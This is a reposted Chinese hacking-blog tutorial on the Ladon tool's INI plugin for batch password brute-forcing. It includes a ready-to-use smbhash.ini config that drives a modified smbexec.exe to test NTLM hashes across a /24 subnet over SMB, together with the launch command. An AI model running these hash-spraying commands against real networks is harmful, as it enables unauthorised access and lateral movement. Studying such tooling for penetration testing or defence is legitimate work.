记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Ladon 6.2自定义密码爆破

2020-03-30 12:29

前言

内置密码爆破模块还不够全面,研发其它协议认证需要时间。
先不说功能实现,首先搭建各种协议认证环境就不少时间吧。
还有别人的工具不开源的情况,而且它只能支持单个IP爆破。
这时候我们需要批量爆破整个C段、多个网段、或批量列表。
批量包括但不限于IP、URL、机器名、CIDR格式、任意XX等。

INI配置插件

适用场景,需调用相关命令或第三方工具进行批量操作
或者有新的POC,但来不及或无法写成DLL来调用时
很多第3方工具不支持批量或者说根本不支持批量网段
而Ladon不只限于批量IP、URL、IP段、任意内容等
是紧急情况下最适合用于验证内网是否存在漏洞工具
新的漏洞来时你能调好POC就不错了,批量更要时间

自定义密码爆破

例子:调用修改过的smbexec.exe进行HASH密码验证,原版不退出无法爆破
根目录下放4个文件,smbexec.exe、smbhash.ini、user.txt、pass.txt。

smbhash.ini

1
2
3
4
5
6
[Ladon]
exe=smbexec.exe
arg=-hashes $pass$ $user$@$ip$
isok=Launching semi-interactive shell
port=445
log=true

INI插件用法

命令:Ladon 192.168.1.1/24 smbhash.ini

INI参数说明

exe: 程序名称,必填项。不指定路径优先加载SYSTEM32目录或当前目录下程序
arg: 程序参数,必填项。其中$ip$、$user$、$pass$变量为字典文件替换变量
isok:成功标志,必填项。如smbexec成功时返回”Launching semi-interactive shell”
port:对应端口,非必填。如SMB为445,Ladon先检测到端口开放,才进行密码爆破
log: 程序日志,非必填。如有些程序返回一堆错误结果,我们不想看,可不显示

检测内网C段是否使用同一个密码,命令:Ladon 192.168.1.1/24 smbhash.ini
截图为6.1,大家记得把ret改成isok就行了。

功能多余?

有人可能会说,功能用不到,批量用自己的程序就可以了。
1.不是所有人都会编程,INI配置的目的主要是给这些人用的。
2.据我所知市面上的批量,仅支持批量单一列表,如IP列表、URL列表等,且不支持模块化。

举个例子:CVE-2019-0708原版漏洞检测批量支持C段扫描,但不支持批量C段甚至批量B段扫描。
没错它是开源的,但有几个人去实现修改让它支持更多实战环境的批量需求?
C语言的多线程操作可和Python这种小学生都能轻松学会的人随便写的啊。
如果别的Poc,用其它你不懂的语言来写,你需要急用,你还会慢慢去学?
当然你不觉得麻烦,也可以另外用自己会的语言写个批量调用工具,哈哈

+知识星球


知识来源: k8gege.org/p/53177.html

阅读:50845 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Ladon 6.2自定义密码爆破”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词